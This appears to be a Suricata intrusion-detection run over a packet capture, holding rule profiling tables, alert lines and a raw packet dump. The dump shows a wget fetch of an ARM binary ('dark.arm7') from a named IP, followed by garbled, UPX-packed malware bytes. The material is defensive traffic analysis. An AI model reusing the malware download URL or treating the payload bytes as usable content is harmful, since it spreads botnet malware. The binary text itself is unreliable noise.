  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         128486          16              16              22004           8030.00         8030.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: threshold
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  threshold        100016          6               6               25578           16669.00        16669.00        0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1045280         200             31              20542           5226.00         5238.00         5224.00        
  pcre             916638          11              1               749392          83330.00        71088.00        84555.00       
  urilen           162472          30              10              20242           5415.00         5092.00         5577.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1878610         195             0               431378          9633.00         0.00            9633.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5830            1               0               5830            5830.00         0.00            5830.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1085998         48              1               292908          22624.00        6650.00         22964.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1496988         187             98              425420          8005.00         6218.00         9972.00        
  pcre             99104           4               2               30796           24776.00        28268.00        21284.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          393660          70              14              21350           5623.00         5920.00         5549.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_len
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          168566          30              30              7176            5618.00         5618.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          11054           2               2               5916            5527.00         5527.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          74840           13              2               15724           5756.00         5560.00         5792.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  pcre             14402           1               1               14402           14402.00        14402.00        0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          10672           2               2               5700            5336.00         5336.00         0.00           

09/19/2019-08:07:12.685917  [**] [1:2025125:1] ET INFO ARM7 File Download Request from IP Address [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.122.105:53098 -> 192.236.178.80:80
09/19/2019-08:07:12.781794  [**] [1:2019240:14] ET POLICY Executable and linking format (ELF) file download Over HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.236.178.80:80 -> 192.168.122.105:53098
09/19/2019-08:07:13.416654  [**] [1:2400000:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 1 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 5.157.42.154:52869 -> 192.168.122.105:53291
09/19/2019-08:07:38.336714  [**] [1:2400012:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 13 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 161.0.7.66:52869 -> 192.168.122.105:53291
09/19/2019-08:07:52.717056  [**] [1:2400015:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 16 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 181.177.97.189:52869 -> 192.168.122.105:53291
09/19/2019-08:08:05.373812  [**] [1:2400012:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 13 [**] [Classification: Misc Attack] [Priority: 2] {ICMP} 160.124.224.70:3 -> 192.168.122.105:10
09/19/2019-08:08:14.165663  [**] [1:2400005:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 6 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 107.182.246.15:52869 -> 192.168.122.105:53291
09/19/2019-08:08:18.021446  [**] [1:2400012:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 13 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 160.124.82.153:52869 -> 192.168.122.105:53291

  --------------------------------------------------------------------------
  Date: 9/23/2019 -- 11:17:10. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2003068      1        7        188441078    6.75   33640    0        15419818    5601.70     0.00        5601.70    
  2        2010938      1        3        178835764    6.41   33640    0        12771154    5316.16     0.00        5316.16    
  3        2024228      1        3        12972760     0.46   4        0        12669282    3243190.00  0.00        3243190.00 
  4        2002992      1        7        169175786    6.06   33640    0        10807166    5029.01     0.00        5029.01    
  5        2102523      1        8        166907892    5.98   33897    0        7329838     4923.97     0.00        4923.97    
  6        2002994      1        7        172266256    6.17   33640    0        7244224     5120.88     0.00        5120.88    
  7        2010939      1        3        169391954    6.07   33640    0        7121258     5035.43     0.00        5035.43    
  8        2002993      1        7        171861394    6.16   33640    0        6864106     5108.84     0.00        5108.84    
  9        2001580      1        15       164663772    5.90   33640    0        6729932     4894.88     0.00        4894.88    
  10       2013506      1        1        166403494    5.96   33640    0        6727608     4946.60     0.00        4946.60    
  11       2102523      1        8        215783956    7.73   44857    0        2524096     4810.49     0.00        4810.49    
  12       2024909      1        2        2451018      0.09   7        0        2251948     350145.43   0.00        350145.43  
  13       2025441      1        2        1289002      0.05   10       0        808030      128900.20   0.00        128900.20  
  14       2007880      1        7        828346       0.03   11       0        467634      75304.18    0.00        75304.18   
  15       2825905      1        2        1541706      0.06   31       0        466416      49732.45    0.00        49732.45   
  16       2015872      1        6        2299024      0.08   31       0        462716      74162.06    0.00        74162.06   
  17       2017552      1        6        2860526      0.10   67       0        460284      42694.42    0.00        42694.42   
  18       2016537      1        2        2142688      0.08   56       0        455910      38262.29    0.00        38262.29   
  19       2816454      1        2        2334556      0.08   41       0        454978      56940.39    0.00        56940.39   
  20       2022502      1        4        1903574      0.07   42       0        452790      45323.19    0.00        45323.19   
  21       2020936      1        3        1845960      0.07   41       0        451350      45023.41    0.00        45023.41   
  22       2807559      1        2        3883750      0.14   171      0        444050      22711.99    0.00        22711.99   
  23       2001582      1        15       159765084    5.72   33640    0        438700      4749.26     0.00        4749.26    
  24       2001219      1        20       158189528    5.67   33640    0        433428      4702.42     0.00        4702.42    
  25       2809816      1        2        634204       0.02   41       0        424782      15468.39    0.00        15468.39   
  26       2103072      1        3        578208       0.02   31       0        424068      18651.87    0.00        18651.87   
  27       2016683      1        2        675446       0.02   40       0        422470      16886.15    0.00        16886.15   
  28       2013926      1        8        644508       0.02   41       0        420594      15719.71    0.00        15719.71   
  29       2820157      1        2        323740       0.01   1        0        323740      323740.00   0.00        323740.00  
  30       2820158      1        2        321960       0.01   1        0        321960      321960.00   0.00        321960.00  
  31       2806561      1        5        162877216    5.84   33640    0        320760      4841.77     0.00        4841.77    
  32       2804911      1        3        293896       0.01   1        0        293896      293896.00   0.00        293896.00  
  33       2815174      1        3        1588086      0.06   41       0        230152      38733.80    0.00        38733.80   
  34       2002995      1        10       159546454    5.72   33640    0        190728      4742.76     0.00        4742.76    
  35       2024240      1        2        164576       0.01   1        1        164576      164576.00   164576.00   0.00       
  36       2002910      1        6        157881316    5.66   33640    0        121426      4693.26     0.00        4693.26    
  37       2816356      1        2        2357880      0.08   42       0        117904      56140.00    0.00        56140.00   
  38       2828803      1        2        90702        0.00   1        0        90702       90702.00    0.00        90702.00   
  39       2804927      1        2        86848        0.00   1        0        86848       86848.00    0.00        86848.00   
  40       2808314      1        4        649996       0.02   10       0        82364       64999.60    0.00        64999.60   
  41       2021067      1        2        82266        0.00   1        1        82266       82266.00    82266.00    0.00       
  42       2822979      1        3        79592        0.00   1        0        79592       79592.00    0.00        79592.00   
  43       2002911      1        6        158113798    5.66   33640    0        77786       4700.17     0.00        4700.17    
  44       2025178      1        2        619822       0.02   10       0        77030       61982.20    0.00        61982.20   
  45       2025119      1        3        600924       0.02   10       0        71986       60092.40    0.00        60092.40   
  46       2024771      1        1        425302       0.02   44       0        70654       9665.95     0.00        9665.95    
  47       2825235      1        2        65722        0.00   1        0        65722       65722.00    0.00        65722.00   
  48       2025125      1        1        64986        0.00   1        1        64986       64986.00    64986.00    0.00       
  49       2802987      1        5        63876        0.00   1        0        63876       63876.00    0.00        63876.00   
  50       2020295      1        6        478666       0.02   10       0        62654       47866.60    0.00        47866.60   
  51       2801929      1        7        62640        0.00   1        0        62640       62640.00    0.00        62640.00   
  52       2815254      1        7        519788       0.02   10       0        62450       51978.80    0.00        51978.80   
  53       2802991      1        5        119694       0.00   2        0        61766       59847.00    0.00        59847.00   
  54       2019240      1        14       59816        0.00   1        1        59816       59816.00    59816.00    0.00       
  55       2804907      1        3        59628        0.00   1        0        59628       59628.00    0.00        59628.00   
  56       2801930      1        7        58854        0.00   1        0        58854       58854.00    0.00        58854.00   
  57       2830124      1        1        58602        0.00   1        0        58602       58602.00    0.00        58602.00   
  58       2816492      1        3        1454778      0.05   41       0        56806       35482.39    0.00        35482.39   
  59       2014519      1        7        52478        0.00   1        0        52478       52478.00    0.00        52478.00   
  60       2821615      1        2        48730        0.00   1        0        48730       48730.00    0.00        48730.00   
  61       2816619      1        2        366826       0.01   42       0        48580       8733.95     0.00        8733.95    
  62       2823166      1        3        47722        0.00   1        0        47722       47722.00    0.00        47722.00   
  63       2829644      1        1        47496        0.00   1        0        47496       47496.00    0.00        47496.00   
  64       2820972      1        2        46836        0.00   1        1        46836       46836.00    46836.00    0.00       
  65       2827279      1        5        102198       0.00   11       0        46490       9290.73     0.00        9290.73    
  66       2013186      1        19       46216        0.00   1        0        46216       46216.00    0.00        46216.00   
  67       2025162      1        2        46174        0.00   1        0        46174       46174.00    0.00        46174.00   
  68       2828008      1        2        95342        0.00   11       0        45050       8667.45     0.00        8667.45    
  69       2828876      1        1        1986586      0.07   385      0        43640       5159.96     0.00        5159.96    
  70       2814886      1        1        4188846      0.15   229      0        42946       18291.90    0.00        18291.90   
  71       2816165      1        5        42606        0.00   1        0        42606       42606.00    0.00        42606.00   
  72       2012707      1        5        41712        0.00   1        0        41712       41712.00    0.00        41712.00   
  73       2019345      1        2        251154       0.01   10       0        41444       25115.40    0.00        25115.40   
  74       2025124      1        1        39302        0.00   1        0        39302       39302.00    0.00        39302.00   
  75       2810793      1        5        1016854      0.04   189      0        38578       5380.18     0.00        5380.18    
  76       2020557      1        2        37156        0.00   1        0        37156       37156.00    0.00        37156.00   
  77       2013382      1        3        36978        0.00   1        0        36978       36978.00    0.00        36978.00   
  78       2014956      1        1        64656        0.00   2        0        36822       32328.00    0.00        32328.00   
  79       2830035      1        2        36494        0.00   1        0        36494       36494.00    0.00        36494.00   
  80       2826256      1        2        36338        0.00   1        0        36338       36338.00    0.00        36338.00   
  81       2809267      1        8        35970        0.00   1        0        35970       35970.00    0.00        35970.00   
  82       2809231      1        1        921018       0.03   171      0        35782       5386.07     0.00        5386.07    
  83       2810481      1        4        35470        0.00   1        0        35470       35470.00    0.00        35470.00   
  84       2022197      1        3        35438        0.00   1        0        35438       35438.00    0.00        35438.00   
  85       2829579      1        1        209656       0.01   31       0        35392       6763.10     0.00        6763.10    
  86       2829607      1        1        35172        0.00   1        0        35172       35172.00    0.00        35172.00   
  87       2024829      1        2        100664       0.00   3        0        34626       33554.67    0.00        33554.67   
  88       2806802      1        2        226470       0.01   7        0        34620       32352.86    0.00        32352.86   
  89       2016502      1        2        195228       0.01   8        0        27898       24403.50    0.00        24403.50   
  90       2016143      1        3        50178        0.00   2        0        27094       25089.00    0.00        25089.00   
  91       2100540      1        12       68066        0.00   6        0        26338       11344.33    0.00        11344.33   
  92       2016948      1        2        26096        0.00   1        0        26096       26096.00    0.00        26096.00   
  93       2806857      1        2        169310       0.01   31       0        26032       5461.61     0.00        5461.61    
  94       2022331      1        3        487376       0.02   97       0        25750       5024.49     0.00        5024.49    
  95       2807130      1        4        24944        0.00   1        0        24944       24944.00    0.00        24944.00   
  96       2819694      1        2        24748        0.00   1        0        24748       24748.00    0.00        24748.00   
  97       2014958      1        1        40656        0.00   2        0        24736       20328.00    0.00        20328.00   
  98       2820003      1        2        24642        0.00   1        0        24642       24642.00    0.00        24642.00   
  99       2024650      1        1        48844        0.00   2        0        24604       24422.00    0.00        24422.00   
  100      2809306      1        4        47450        0.00   2        0        24440       23725.00    0.00        23725.00   
  101      2024929      1        1        24340        0.00   1        0        24340       24340.00    0.00        24340.00   
  102      2828966      1        1        93086        0.00   4        0        24190       23271.50    0.00        23271.50   
  103      2017748      1        6        24162        0.00   1        0        24162       24162.00    0.00        24162.00   
  104      2014473      1        5        24086        0.00   1        0        24086       24086.00    0.00        24086.00   
  105      2016503      1        2        182724       0.01   8        0        23944       22840.50    0.00        22840.50   
  106      2023510      1        2        863484       0.03   171      0        22492       5049.61     0.00        5049.61    
  107      2804587      1        2        216778       0.01   41       0        21716       5287.27     0.00        5287.27    
  108      2811445      1        4        226274       0.01   41       0        21142       5518.88     0.00        5518.88    
  109      2023016      1        1        196492       0.01   32       0        20718       6140.38     0.00        6140.38    
  110      2828877      1        1        314868       0.01   58       0        20516       5428.76     0.00        5428.76    
  111      2100474      1        5        287522       0.01   56       0        20242       5134.32     0.00        5134.32    
  112      2014380      1        4        1202050      0.04   229      0        20134       5249.13     0.00        5249.13    
  113      2008420      1        4        1170616      0.04   223      0        19994       5249.40     0.00        5249.40    
  114      2001330      1        8        464398       0.02   92       0        18160       5047.80     0.00        5047.80    
  115      2102330      1        3        160400       0.01   31       0        11560       5174.19     0.00        5174.19    
  116      2016364      1        1        302994       0.01   58       0        10046       5224.03     0.00        5224.03    
  117      2810792      1        5        887664       0.03   189      0        9396        4696.63     0.00        4696.63    
  118      2100719      1        8        31938        0.00   5        0        8712        6387.60     0.00        6387.60    
  119      2002823      1        11       8004         0.00   1        0        8004        8004.00     0.00        8004.00    
  120      2025132      1        2        57540        0.00   10       0        7888        5754.00     0.00        5754.00    
  121      2020661      1        3        13718        0.00   2        0        7796        6859.00     0.00        6859.00    
  122      2809481      1        1        200650       0.01   40       0        7560        5016.25     0.00        5016.25    
  123      2022330      1        2        456524       0.02   93       0        7040        4908.86     0.00        4908.86    
  124      2024287      1        2        152742       0.01   31       0        6880        4927.16     0.00        4927.16    
  125      2827580      1        7        2

4
]ƒ70
w]æ¥

À¨ziÀì²PÏjPø
]ƒ70]ƒ70
w]
ÜEÎÜÀ¨ziÀì²PÏjPPËvGET /dark_bins/dark.arm7 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 192.236.178.80
Connection: Keep-Alive

4]ƒ70íâϨ
!
Àì²PÀ¨ziPÏj‘]ƒ70]ƒ70íâ
uEgCÀì²PÀ¨ziPÏjPãÕ$p“/±Mñùm–öÇ‹,:¥Xxq«Yk?¶_©f—¡¦øç<6mûŸ`ö­ÚOTÛ{m1 O¯õü6ngM.?¸ŸWX¥m­O
Ù຦$-½Í—®¦° ð‘‰2y_ƒ(²8>N¾A”IƒÚ[T3µâr;ê&UÇÇ
<Š§}ëR¤2yüy¢Ëā'˜­‹SÁ„ÑѧC V</²OÚi$¦Bï†$´X~‹åÃþËÄÊrŠo É¸•iv±ª²Ã(ˆ¿¬§Î+Ö¡ÿÈÕüôڗ“ú:Ó*n^IÀåå
¹
äþ¹—Úˆ_W\¹9ƒŽ=
ç"¼Ç}0Ê*–²¾_
’±_gão&HØ1Zðâ¾&¸'¶KƊ+¦„k'‡ŠH¦sP˜¹o޳d^^Ù|mù ,×t‘Y}Eùÿµ^bŠÑGO’ÜÙ°=YfÈ¿ÐÛëýä(=þºË(CÖíŠó+œ\Y'u5+
ø‘ÑV3zoÏ£{&b×`u
ÊØ@ì¡ÿ$ÓÚbÜ&
5Íַܚu{ә<äŽÈ©xovØ®‹=1ĉê€Îèô ÊÐa[§¥ÊÇf~9ëZ%­Wkï/#¹&]WE)Ç!2CêYÜÁ4ŽL÷”þ$Œ„ZzïCGáZàL_Ï.èä«6“–‘«]?ÆóØWõþLö›v
rFêà 3`eSÌwʯœe1¼ÉGµ·1Z¢³éÓ̍°ðÂå+½¶Ù#ÛR÷ugÐ{2Z`³äQHøyufÈ]J7ø6ž¢AìOµŒT¸³ÌŠÝéWÞ\ڕm0«~à
ñ‹=š‡j*p_•«÷€RQœhlÚmoKì¤Ã¬¬""u*.rÁn׶ï
sõ|.¥t‘Áâ[s?
ŧíô
Æ~Ý5ÿ§ïS>¸+ö7îÎS"œ¼ôQ¦~J‚Þ5á6©cý¤ªhIæšÐ+ð…58os„¾“ûšbžH
¹à¤0¾RÅK%’ÆU«"²¨’vÑ	äÐÜÒÉÿ­Ç³-lB̔“–«1,øÙÂ2^ÈæK$!ª÷#¶üÿ·§¶æŽèùzÒ-ÃQº¬oۗ¬ÇuþŸxíóyù„çE©Äæ‹O¡Õ²Æc$BêǓØf2ü3&õxä½Gí“è"‰Ðf­Ù-;„4ˆÒ~HÍ»m߄USÛéø¥tÌA‹j]¤Pm4üÌ!Sv$zMYýϊؼQŸèæ
àë¦È+øå‚í¼•j™ÎÄÜSòÆþþ§Åˆ¹" –“=xä֗ñ™Ô³í#5å«¿ÖYŸÆÈ?ê^ÐANXÈ„X´w]ÐEȪ[s_Ðï*‘ízöñ©yÊ;iÊ÷/)&Á€³ÃÂ>·Ã.'à„¥¤•¦ÕþÊêﷅ‘]ƒ70]ƒ70íâ
uEgCÀì²PÀ¨ziPÏjPÝ‹ûÝÙûtYi5úÐR¿õT‡å8Ä#¹_¬ÃxaÏ|ÏԓL‰°®ÜAaÁy^Ž(1À– €˜ÿU ll8…2,
ÏKŸfZÉ{ßµKgŒÀ7»íÛè—úÙ¿¾â\¡þÛ}†ê!ÉsӍ9Ɖ)y'O-DÙy˜øX1€
?[aùPX'W¬­&¬g„y*¦B2{Z¬ô?J|mEéÿIÊCÀ层è=•„véä?jA§UF‚bÓJÔ7H…õ]ömߤ¨dö
Dè¢I1)©·<ŽK”çÛ¯—ýR±#¾Á¯3»•i|ñ¯šôz,AÅ1„ ð#<ƒ½=­DsxBWú 6Ýó²cÀÒ^D\Z°õ˜ÞK€ªåZ€Žÿ³Â{rB˛Ä:žj£LÒÚQã55RÞ)N
Ì[¡šNTYU·V¯Â¿ÕT†©‘2)î¤ðW

CLk1"Bøq_ko‹èìS&èÂ-éè¨Fš–xk¾äGÞª„#PkL.‡@°ú|{@ñ+¿¡‹_ɜñ*Ä[…íô3B/eùy¿þ[ÿ²+Ò1ë«³(Z3w„~°]b©Àã©@ÅêX¬Þ_IJðdÁ#E×NvAÌ'b¥))o(:mòO~§û]ir©¶TÍȼÀrCÔ[ÖlP#ñq‰@Á¼*õ‹Á\ÝT
Ö÷èê«ãرd¿ü.ñ›Œ£Ø;¨X€	¨žŦ蟮:‘¶373©{Ä5iŒî%–üí0ݕÇE°&¬n"R™O¸¾Œó	Ô÷­É],¤	Þ枕J°îl+Œ£l¦²E‡.s©»A²€ðÙT„å.
Q5çRÕåÝŠÿùd…·ÄþÅéaxïŠ3V6ˆ„äöüG&“,¶(@Q+°”
@$¶Î¢]ò}SR X?DÈT¯mU^í˜ú ÷5Ë[ܖ:o”Ð&{	šžq¥G#Ö%îI&3vn!¼—r¼„ä[.+>èå{˜íÅÍ|·ðTLY/»«YÄ)/óIP®ó*‚¹¦¨Ý˜ë&KFôoø칸ƒ™·Bؕ6ðVÛc«*šåîCêEYJ‘‰œ¼í…pç•8Ÿª@èl!ô*“3 °wN ˆöɘ‰v{É¿Mý@… à›V\ì[Έ¢%™
°‰
âi‡”«K&›[&ív@gûãH/‹T^EЅ•
ÄË)ÉbȾwÅëiêì’|«“›«ß­Vw˜ú­
7pw³Àm3Á'Hµû÷'(lF)‡‹ÆKXxä=Í#Åãð¸]xQÂrN.
›¢­:´ÁŠÔ~ñœq Ó
å9Íi¦¸M
h‹mûÆ0¢Ÿ ÇPeT’ò˜mfíRš@·¿¹¨	÷)iõ	!÷ƹ‘]ƒ70]ƒ70íâ
uEgCÀì²PÀ¨ziPÏjP½¨ûÎñ¼qÉ«w—	v^@Ö1Læ?š]8¾ŒX8Ž¤¥=nx@›×XìZB¦JU×ʍޏá$p/
b
O953þ#]^S¡“̉èH_|#?Q#nè©ïA.?6sgN.[µ,eŽeù.Ë55î/Îrím°àhži2(p#ÝúqDQK®àˆ¯~g%”ý!`·¿O©z¦dúóÊÚÛäv·ÂÙxÞó—^ü6Ca‰møƒU=çë0)¯‹Ôoæô(9³XJ%¥ß)§½k£M‰ì”#Pæa§*#Aß:&e©k²Iõ{½ßn+“ý7=À½åï;纏EêFaêþI«].Ò§ }tqvçMR´Bxxöù#V:Oö«`T‡ü‡€è
Ä"ÀOâLœè á°‹à Šà0›å
Là
  áà
â0 ã@-é  ã0œå	À áP ã@àã0ƒãÀp ãï

pãž*þ
¹è
Yáþ
 èûÿÿ:	@@àålPâ€äà áP…à á‰à  ãp ãx‡ãï¼¢Üá  ãå

àL Šâ
Ià Šà Šà›å
@-é0›å‹â›å  á0å0âà áð á€½èÀÝå\ãxH-é°Ðå̠㫱 áË á
° á:͌âÐMàÀ“å0åÀå å0âÀ ãÀƒäSáüÿÿ0â Aâ á
ÀÑäÀâÀÍå
ÀÑä, áÍåÀâÀÍåâëРá0 á½è‘åà  ãÀ áp ãx‡ãïp á áˆ½èðO-é0ÐMâ0å0ÐåPÐå
àÐåÀå0å\0å@ ã@Œå@ƒåÀå
0Ðå0ŒàÌ ãàá
0 ãî á5 ásΌâ
0Câ
àNâ€âÀŒâå0åàååêå
 ã°ƒáTá„0 á
@„âøÿÿ0å` ãƒàà á  áPå	0eàRá
àŽâ
0Òç
 ‚âRãdƒáõÿÿ° ã
À ãp áàã,Àå°åÀå Àå$Àåü
êÿ„àãPáŠ	^á

0Þä ádƒáå å
 à á
0ŠàƒP á0åµÀ“á 5 áœàVáh*å0`âW3 áå
 à0ƒà‘]ƒ70]ƒ70íâ
uEgCÀì²PÀ¨ziPÏjP›
å, ã“"àå;lâQãÃ2Œà掂âµ0€á€ˆâ Ñ
 Ó@Ú, åTPå0bàpÕç á
 ã‡p á
\⁠ á…0ˆà
0Ĉ
PãLƒâ
Àâ*	^á áÓ


0Þädƒá°0Ôá % áà“à+câVáÂ"ƒà£2Cà*Uã á° Äá
 á
 áêUã°0Äá`làlà
ÿQãÊÙÿÿê
Pãà*	^á á³


0Þädƒá´0˜á % á“à+câVá£RCàÂ2ƒà´0ˆ1´Pˆ!là 1 1`l ÿQã@ á
0âæÿÿÚÀåÿp
â\ãTå  ÓpÁç
°‹â Õ‡
Ú0å	SãPÅ0CÒPEÂ0ÕPÅ
ê¬2Là dàÀåRáµ0Œá`dàŠ	^á†


0Þä$ ádƒáå0åƒp€à
‡â°ÀÐá¢5 áœàVá* åPåRã;lâf…â  Ã På  ÓÃ2Œà åÀå, å$PåâP á Àå å°0Àá€ê dà¬2LàRá°0Àá`dàŠ	^á_


0Þä$ ádƒáf_‡â°ÀÕá¢5 áœàVá'*;lâÃ2ŒàTá°0ÅáŠ	^áO


0ÞäD ádƒáPå0…àŠ0ƒàƒâ°ÀÑá¤5 áœàVá`b ¬2L Pb )*;lâÃ2Œà[ã°0Áá;

,ÀååTå0làpÐçQã Ã	 ÓåpÀç á
°‹â
ê dà¬2LàRá°0Åá`dàŠ	^á&


0Þä$ ádƒá‡â°ÀÑá¢5 áœàVá*,På;l⠝åÃ2ŒàPåP á, å°0Áá%ê dà¬2LàRá°0Áá`dàŠ	^á


0Þä$ ádƒár‡â°ÀÑá¢5 áœàVá*;lâ  åÃ2Œà,åÀåP á Àååâÿÿê¬2Là°0Áá,Àå â
‘èPdà å$å  åÀå,0å`dà ååRã  Ã  Ó¦€â åâÿtàãUáŠ	^áá‘]ƒ70]ƒ70íâ
uEgCÀì²PÀ¨ziPÏjP§¼

0ÞäT ádƒá°ÀÑá¥5 áœàVá*
"à;lâÃ2ŒàP‚â á  ã€ ã°0Ááê dà¬2LàRá`dà°0ÁáŠ	^áÈ

0Þä$ ádƒá²ÀÑá¢5 áœàVá*
"à;lâÃ2ŒàA_‚â á  ã€ ã²0Ááê¬2Là²0Áá`dàdà_â  ã€ ã
p á
 ã
0â
Pã@ áà*	^á á¦

0Þädƒá´0•á % á“à+câVáÂ"ƒà£2Càlà 1 1´ …1`l ´0…!
pWâæÿÿ
  ã:AàPå0ƒàUã(0åiÊÀåSã0 £ƒ3Œà6^ƒâp á€ ã
0‡â
Pã‡@ áp‡à*	^á á

0Þädƒá´0•á % á“à+câVáÂ"ƒà£2Càlàp 1 1´ …1`l ´0…!
€Xâæÿÿ@ GâRãP Ñ?ÚÂ@ á
Rã
0â
pDâÀƒã@D  ÁÊW áå…0à‚0CàUNƒâ@„âê
Pã
 ‚â*	^á áU

0Þädƒá  áVáŒÀ á`` 
ÀŒ#Ráðÿÿ åM‚â@„âR áp ã
  ã
€ á
P㈠á
Àˆâ*	^á á>

0Þädƒá±0”á % á€ˆà“à+câVáÂ"ƒà£2Cà
P…!
€ 1 1± „1±0„!`l l 
pW⊠ áäÿÿ
P•â,På
0å0ƒâ0å,PåUá!Š(ÀåTå0eà Œâ@àÀà
 RâXPå0 
0 
°‹â[á0 #
02
pÔäSã
pÌäóÿÿXÀå[áÿýÿ:
Pã*	^á

àŽâåå\ å0`à ã0å°‚åê
 ã0Ѝâð½è  ãâ ãp ãï ã
p ãïPROT_EXEC|PROT_WRITE failed.

$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.94 Copyright (4]ƒ71[Ž$Ÿ

\*šÀ¨zi΅Ð+R]ƒ71]ƒ71[Ž
6"3Àø
kE(@5ڇ*šÀ¨zi΅Ð+*›Puž4]ƒ7J#J$Ÿ

\¡BÀ¨zi΅Ð+R]ƒ7J]ƒ7J#J
6"3Àø
kE(Áý@6Ÿ~¡BÀ¨zi΅Ð+¡CP…‡4]ƒ7X
ñ$Ÿ

\µ±a½À¨zi΅Ð+R]ƒ7X]ƒ7X
ñ
6"3Àø
kE(–@6\Gµ±a½À¨zi΅Ð+µ±a¾P§.4]ƒ7e´4$Ÿ

\ |àFÀ¨zi

n]ƒ7e]ƒ7e´4
R"3Àø
kEDæq/
ér |àFÀ¨zi
¸åE(øé0ÖÀ¨zi |àFÖ+ |àFP³CéÃ4]ƒ7n‡$Ÿ

\k¶öÀ¨zi΅Ð+R]ƒ7n]ƒ7n‡
6"3Àø
kE(3O@1y©k¶öÀ¨zi΅Ð+k¶öP€4]ƒ7rSÆ$Ÿ

\ |R™À¨zi΅Ð+R]ƒ7r]ƒ7rSÆ
6"3Àø
kE(@.© |R™À¨zi΅Ð+ |RšPïà

lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/e50b5b64c5f3331deb0fb67bc7c285a556b33745cb75ec8c950e11a498e082d2 -r /var/pcap/09232019.1116-pcap_6.pcap -vvv -k none
elapsedtime:30.323215
stderr:
stdout:
23/9/2019 -- 11:16:40 - <Info> - Configuration node 'rule-files' redefined.
23/9/2019 -- 11:16:40 - <Notice> - This is Suricata version 4.0.0 RELEASE
23/9/2019 -- 11:16:40 - <Info> - CPUs/cores online: 1
23/9/2019 -- 11:16:40 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 32754 and 'request-body-inspect-window' set to 15749 after randomization.
